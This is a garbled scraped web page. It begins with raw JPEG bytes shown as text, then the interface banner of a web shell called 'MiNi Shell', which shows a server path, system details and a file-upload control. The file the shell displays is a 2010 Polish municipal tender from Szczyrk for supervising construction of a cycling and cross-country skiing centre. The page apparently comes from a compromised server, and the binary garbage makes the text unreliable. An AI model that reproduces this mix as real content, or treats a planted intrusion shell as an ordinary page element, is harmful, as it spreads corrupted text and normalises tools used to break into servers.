JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100511/118937-N-2010.html

<p class="kh_header"><b>Szczyrk: Pełnienie funkcji Kierownik projektu/Inspektor nadzoru nad realizacją zadania pn. Budowa Centrum Rekreacji (crossowy tor rowerowy i trasa narciarstwa biegowego) w Mieście Szczyrk</b><br>
<b>Numer ogłoszenia: 118937 - 2010; data zamieszczenia: 11.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Szczyrku , ul. Beskidzka 4, 43-370 Szczyrk, woj. śląskie, tel. 033 8295026, faks 033 8178763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.szczyrk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Kierownik projektu/Inspektor nadzoru nad realizacją zadania pn. Budowa Centrum Rekreacji (crossowy tor rowerowy i trasa narciarstwa biegowego) w Mieście Szczyrk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Celem niniejszej kontraktu jest  nadzorowanie zadania pn. Budowa Centrum Rekreacji (crossowy tor rowerowy i trasa narciarstwa biegowego) w Mieście Szczyrk realizowanego w ramach  - Europejskiego Funduszu Rozwoju Regionalnego  w ramach RPO WSL  2007-2013.
Nadzór nad realizacją umowy obejmował będzie organizację i koordynację procesu inwestycyjnego, kontrole, rozliczenie rzeczowo-finansowe robót,  prowadzenie nadzoru inwestorskiego zgodnie z polskim Prawem Budowlanym oraz  wymogami Europejskiego Funduszu Rozwoju Regionalnego  w ramach RPO WSL  2007-2013.
2. ZAKRES PRAC
2.1 Informacje ogólne
Kierownik projektu/Inspektor nadzoru jest odpowiedzialny za rozliczenie, nadzór  nad realizacją robót budowlanych i  koordynację realizacji Projektu .
Kierownik projektu/Inspektor nadzoru zobowiązany jest do zapoznania się z dokumentacją projektową, zobowiązany jest  również do:
a)kontroli jakości robót oraz wbudowywanych materiałów i urządzeń, 
b)udziału w odbiorach częściowych i końcowym, 
c)uczestniczenia w kontrolach, sporządzania i archiwizacji wszelkich dokumentów wymaganych przepisami prawa i programem RPO WSL 2007-2013 w zakresie realizowanego projektu. 
2.2 Zadania szczegółowe  Kierownik projektu/Inspektor nadzoru
1. Kierownik projektu/Inspektor nadzoru ponosi  pełna odpowiedzialność za prowadzenie robót zgodnie z obowiązującym prawem budowlanym, programem RPO WSL 2007-2013, ustawą Prawo zamówień publicznych, umową zawartą pomiędzy Gminą Szczyrk  i Instytucją Pośredniczącą oraz wykonawcą  w zakresie przewidzianym projektem .
2. Kierownik projektu/Inspektor nadzoru w terminie do 7 dni licząc od daty podpisania umowy uzgodni z Zamawiającym metody składania i wzory wszystkich wymaganych  raportów inspekcyjnych,  protokółów odbiorów częściowych i końcowego oraz innych dokumentów mających być w  użyciu w ramach realizacji Projektu.
3.  Kierownik projektu/Inspektor nadzoru zapewnia  pełny  nadzór inwestorski we wszystkich aspektach zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane.(j.t. Dz.U. Nr 156 z 2006., poz. 1118 ze zm.) 
4.  Kierownik projektu/Inspektor nadzoru systematycznie monitoruje i dokumentuje postępy w realizacji Projektu zgodnie z dokumentacją techniczną, dokumentami przetargowymi oraz zatwierdzonymi harmonogramami.
5. Kierownik projektu/Inspektor nadzoru będzie odpowiedzialny za sprawdzanie i harmonogramów rzeczowo-finansowych  całego Projektu.
6. Kierownik projektu/Inspektor nadzoru organizuje i prowadzi narady techniczne, problemowe i inne spotkania, które będą prowadzone w razie potrzeby, ale nie rzadziej niż  dwa w miesiącu oraz przygotowuje notatki i raporty w celu umożliwienia podejmowania decyzji o każdym zagadnieniu, które wpływa na postęp robót. W spotkaniach tych powinny uczestniczyć wszystkie strony zaangażowane w Projekt. 
7.  Kierownik projektu/Inspektor nadzoru jest odpowiedzialny za rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót.
8.  Kierownik projektu/Inspektor nadzoru jest odpowiedzialny za ocenę, aprobatę bądź odrzucenie wszystkich próśb Wykonawcy zgodnie z obowiązującym prawem budowlanym. Wszystkie decyzje mogące wpływać na zakres umowy, jego czas trwania lub cenę wymagają zgody Zamawiającego.
9. Kierownik projektu/Inspektor nadzoru weryfikuje, analizuje i zatwierdza do zapłaty faktury wystawione przez Wykonawcę w związku z realizacją umowy z Wykonawcą.
10. W przypadku wystąpienia konieczności wykonania robót dodatkowych Kierownik projektu/Inspektor nadzoru jest odpowiedzialny za uzgodnienie sposobu postępowania z Zamawiającym.
11. Kierownik projektu/Inspektor nadzoru jest zobligowany do udzielania regularnych konsultacji i doradztwa technicznego Zamawiającemu, czynnego uczestniczenia we wszelkich kontrolach jakim zostanie poddany Zamawiający w obszarze realizacji projektu.
12. Kierownik projektu/Inspektor nadzoru  sprawdza jakość wykonywanych robót, wbudowanych elementów, a w szczególności zapobiega zastosowaniu materiałów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania. Inspektor sprawdza czy wszystkie używane materiały posiadają świadectwa i certyfikaty jakości.
13. Kierownik projektu/Inspektor nadzoru jest zobowiązany do sprawdzania i odbioru robót ulegających zakryciu lub zanikających. Dodatkowo  uczestniczy w odbiorach częściowych i końcowym. Sporządza protokoły ze spotkań  odbiorowych.
14. Kierownik projektu/Inspektor nadzoru wydaje kierownikowi robót polecenia potwierdzone wpisem do dziennika budowy dotyczące: wykonania prób, wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót, dowodów dopuszczenia do obrotu i stosowania wyrobów oraz urządzeń technicznych. Sprawuje nadzór nad ilością i terminowością wykonywanych robót. 
15. Kierownik projektu/Inspektor nadzoru ma obowiązek zawiesić roboty w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne.
16. Kierownik projektu/Inspektor nadzoru w  uzgodnieniu z Zamawiającym oraz po konsultacjach z projektantem zatwierdza poprawki do dokumentacji technicznej. 
17. Kierownik projektu/Inspektor nadzoru weryfikuje obmiary każdego etapu robót, a przyjęta metodologia musi być zgodna z przedmiarami robót oraz specyfikacją wykonania i odbioru robót.
18. Kierownik projektu/Inspektor nadzoru  dokonuje weryfikacji  dostarczonych przez Wykonawcę rozliczeń,  oraz zatwierdza je przed dokonaniem płatności przed Zamawiającego    .
19. Kierownik projektu/Inspektor nadzoru jest odpowiedzialny za przedkładanie Zamawiającemu wszystkich raportów, oświadczeń i zapytań dostarczonych przez Wykonawcę.
20. Kierownik projektu/Inspektor  nadzoru sprawdza i zatwierdza w porozumieniu z Zamawiającym dokumentację powykonawczą sporządzoną przez Wykonawcę.
21. Kierownik projektu/Inspektor  nadzoru będzie nadzorował wszystkie próby związane z odbiorem technicznym i rozruchem technologicznym. Inspektor jest zobowiązany do uczestniczenia w próbach końcowych.
22. Kierownik projektu/Inspektor  nadzoru w przypadku zaistnienia nie przewidzianych okoliczności dotyczących realizacji przebiegu planowanej trasy,  wykona dokumentację zastępczą (wraz z uzgodnieniami) odcinków trasy na której zaistniały przeszkody uniemożliwiające wykonanie robót zgodnie z projektami pierwotnymi. Sporządza również kosztorysy  na ewentualne roboty  dodatkowe, zamienne i uzupełniające powstałe w trakcie realizacji robót.
23. Sporządza dokumentację z przeglądów  gwarancyjnych obejmującą: wykaz usterek  i wad, wskazanie przyczyn  powstania usterek i podanie zaleceń odnośnie ich usunięcia , sporządzenie kalkulacji  (kosztorysu ) dot. powstałych usterek i wad.
24. Kierownik projektu/Inspektor  nadzoru, po uzgodnieniu z Zamawiającym, wykona wszystkie inne czynności, nie wymienione w umowie z Wykonawcą , które zostaną uznane za niezbędne dla prawidłowej realizacji Projektu.
25. Skompletowanie i sprawdzenie dokumentacji odbiorowej,
26. Skompletowanie i sprawdzenie dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie w Powiatowym Inspektoracie Nadzoru Budowlanego,
3. Zarządzanie kontraktem.
3.1 Metodyka współpracy z Instytucją Kontraktującą.
Kierownik projektu/Inspektor nadzoru  będzie zarządzał i nadzorował realizację Projektu w przedstawionym zakresie. Kierownik w zakresie wszystkich swoich zadań i obowiązków wyszczególnionych w niniejszym zakresie zadań - będzie podlegał Zamawiającemu.
Kierownik projektu/Inspektor nadzoru -jako podmiot - dysponować będzie kadrą wykwalifikowanych specjalistów, którymi kierować będzie bezpośrednio kierownik Projektu. 
Zamawiający zatwierdza wszelkie harmonogramy, raporty, wnioski i oceny przygotowane przez Kierownik projektu/Inspektor nadzoru. Ponadto  konsultować będzie istotne z punktu widzenia realizacji Projektu decyzje z Zamawiającym.
Przyjmuje się, iż zebrania Jednostki i Kierownik projektu/Inspektor nadzoru w celu omówienia bieżących spraw związanych z Projektem odbywać się będą w miarę potrzeb, lecz nie rzadziej niż dwa razy w miesiącu.
4. LOGISTYKA l HARMONOGRAM ROBÓT.
4.1 Okres realizacji Kontraktu.
Data rozpoczęcia Projektu: od daty  podpisaniu umowy.
Okres realizacji Projektu: 15.10.2010r.  lub ostatecznego rozliczenia projektu.
Okres  rękojmi/gwarancji - 5 lat (od ostatecznego rozliczenia projektu), 
Kierownik projektu/Inspektor nadzoru będzie miał obowiązek uczestniczyć w przeglądach gwarancyjnych wyznaczonych Wykonawcy robót. Liczba przeglądów gwarancyjnych  min. 3. 
Kierownik projektu/Inspektor nadzoru pozostaje do dyspozycji Zamawiającego w celu usunięcia ewentualnych usterek i będzie zobowiązany do udziału w próbach końcowych.

5. WYMAGANIA.
5.1 Skład personalny (kluczowy personel).
Przewiduje się zaangażowanie następującego kluczowego personelu technicznego na budowie:
- Inspektor Nadzoru ( uprawnienia w specjalności konstrukcyjno-budowlanej)
- Inspektor Nadzoru  (uprawnienia w specjalności  drogowej),
- Inspektor Nadzoru (uprawnienia w specjalności  instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych  i elektroenergetycznych),
- Inspektor Nadzoru (uprawnienia w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych  i kanalizacyjnych)
5.2 Wymagania Kwalifikacyjne.
Minimalne wymagania kwalifikacyjne w stosunku do poszczególnych osób są następujące:
1. Kierownik Projektu / Inspektor Nadzoru:
Minimalne wymagane kwalifikacje i doświadczenie zawodowe:
minimum 5 lat stażu pracy zawodowej przy sprawowaniu samodzielnych funkcji technicznych w budownictwie, posiadający doświadczenie w kierowaniu lub nadzorowaniu inwestycjami odpowiadającymi zakresowi będącym przedmiotem projektu  tj. co najmniej  jednej  inwestycji  prowadzonej w ostatnich 5 latach z udziałem Funduszy Strukturalnych Unii Europejskiej, odpowiadającej swoim rodzajem i wartością  przedmiotowi zamówienia 
2. Inspektorzy Nadzoru Inwestorskiego o specjalnościach:
- Inspektor Nadzoru ( uprawnienia w specjalności konstrukcyjno-budowlanej )
- Inspektor Nadzoru (uprawnienia w specjalności  drogowej),
- Inspektor Nadzoru (uprawnienia w specjalności  instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych  i elektroenergetycznych),
- Inspektor Nadzoru (uprawnienia w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych  i kanalizacyjnych)
powinni posiadać minimalne wymagania kwalifikacyjne i doświadczenie zawodowe:
minimum 5 lat stażu pracy zawodowej przy sprawowaniu samodzielnych funkcji technicznych w  budownictwie, posiadają uprawnienia bez ograniczeń w zakresie wskazanym w pkt 2 SIWZ.
4. Kierownik Projektu / Inspektor Nadzoru jest całkowicie odpowiedzialny za odpowiedni dobór zespołu. Podczas nieobecności któregokolwiek ze specjalistów wymienionych powyżej,  w szczególności wynikającej  z urlopu lub przedłużającego się zwolnienia lekarskiego, Kierownik Projektu / Inspektor Nadzoru zapewni czasowe zastępstwo specjalistów na cały czas nieobecności zatrudnionych fachowców by uniknąć zwłoki w realizacji robót. Takie czasowe zastępstwo będzie przedłożone z wyprzedzeniem na piśmie (łącznie z CV proponowanych osób), do aprobaty Zamawiającego.
5.3 Wymagania  sprzętowe.
Kierownik Projektu / Inspektor Nadzoru ze środków własnych zapewnia pokrycie wszelkich kosztów związanych realizacją umowy, w tym jest zobowiązany zapewnić wszelki sprzęt niezbędny dla prawidłowego wykonania umowy.

5.4 Organizacja spotkań.
Zamawiający nieodpłatnie udostępni Kierownik Projektu / Inspektor Nadzoru w okresie trwania umowy w celu organizowania narad całego zespołu Kierownik Projektu / Inspektor Nadzoru i Zamawiającego. Udostępniana będzie sala obrad lub pokój nr 31 w siedzibie Urzędu Miejskiego w Szczyrku, ul. Beskidzka 4, 43-370 Szczyrk. 
5.5 Dokumentacja.
Zamawiający przekaże Kierownik Projektu / Inspektor Nadzoru całą dotychczasową dokumentację techniczną wraz z kompletem projektów, raportów, badań technicznych i innej dokumentacji związanej z tym Projektem, która jest  niezbędna Kierownik Projektu / Inspektor Nadzoru do pełnienia jego funkcji.
6. SPRAWOZDANIA Z REALIZACJI PROJEKTU.
6.1 Wymagania dotyczące sprawozdawczości.
Kierownik Projektu / Inspektor Nadzoru sporządzać będzie sprawozdania, a w szczególności :
-    sprawozdanie końcowe sporządzone w ciągu 10 dni licząc od dnia  zakończenia projektu. 
Ponadto Kierownik Projektu / Inspektor Nadzoru opracuje i przedstawi:
-   raport końcowy z całej swojej działalności Inżyniera Kontraktu - do złożenia w terminie do 10 dni od momentu zakończenia umowy z Wykonawcą,
Składa raporty po uprzednim zatwierdzeniu przez Zamawiającego w formie papierowej -dwa egzemplarze i w wersji elektronicznej.
6.2. Wymagania dotyczące harmonogramowania i płatności.
a) Kierownik Projektu / Inspektor Nadzoru sporządza rozliczenie rzeczowo-finansowego inwestycji z uwzględnieniem wytycznych  RPO WSL 2007-2013. 
b) Przygotowuje informacji do sporządzenia dowodów przekazania - przejęcia na majątek środków trwałych  OT
Realizacja przedmiotowego Projektu będzie finansowana z następujących źródeł:
- Europejskiego Funduszu Rozwoju Regionalnego  w ramach RPO WSL  2007-2013
- środków własnych Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie posiadania niezbędnej wiedzy i doświadczenia tj. udokumentują , że w ostatnich 3 latach zrealizowali ze środków Funduszy Strukturalnych Unii Europejskiej, należycie  co najmniej  1 zamówienie w zakresie pełnienia nadzoru inwestorskiego (bądź funkcji menadżera/ kierownika projektu/Inżyniera kontraktu)  o wartości co najmniej 3.000.00,00 zł brutto, odpowiadającej swoim rodzajem  przedmiotowi zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Kierownik Projektu / Inspektor Nadzoru minimum 5 lat stażu pracy zawodowej przy sprawowaniu samodzielnych funkcji technicznych w budownictwie, posiadający doświadczenie w kierowaniu lub nadzorowaniu inwestycjami odpowiadającymi zakresowi będącym przedmiotem projektu  tj. co najmniej  jednej  inwestycji  prowadzonej w ostatnich 5 latach z udziałem Funduszy Strukturalnych Unii Europejskiej, odpowiadającej swoim rodzajem i wartością  przedmiotowi  zamówienia, 
- inspektorzy nadzoru robót muszą posiadać 5 letnie doświadczenie zawodowe liczone od momentu uzyskania uprawnień na stanowisku kierownika robót oraz uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane z dnia 7 lipca 1994 r (tj. Dz. U. z 2006 r, Nr 156, poz. 1118 z późn. zm.) lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów w specjalnościach:
-  konstrukcyjno - budowlanej,
-  drogowej,
- instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych  i kanalizacyjnych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
